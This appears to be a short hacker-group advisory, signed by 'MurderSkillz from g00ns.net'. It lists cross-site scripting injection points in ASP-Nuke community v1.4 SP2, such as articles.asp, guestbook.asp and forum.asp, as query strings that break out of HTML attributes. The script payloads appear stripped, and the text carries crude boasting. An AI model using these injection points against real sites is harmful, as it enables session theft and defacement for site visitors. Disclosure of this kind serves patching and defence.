I MurderSkillz from g00ns.net have found xss vulnerabilities in ASP-Nuke community v1.4 SP2 (and possibly other versions). Shouts to z3r0, neX, uid0 (exploitercode.com), Zodiac, Wicked, and all the other I may have forgot.. Once again..g00ns.net fucking owns j00! XSS in /articles.asp ?cmd=">&cat=12 -------- /calender.asp ?cat=">&do=year&Date=01%2F03%2F2006 -------- /downloads.asp ?cat="> -------- /guestbook.asp ?do='> -------- /images.asp ?cat="> -------- /forum/forum.asp ?forum=1§ion=1&post=">&page=last ------- /profile.asp ?id= ------- /search.asp ?section=news&r=">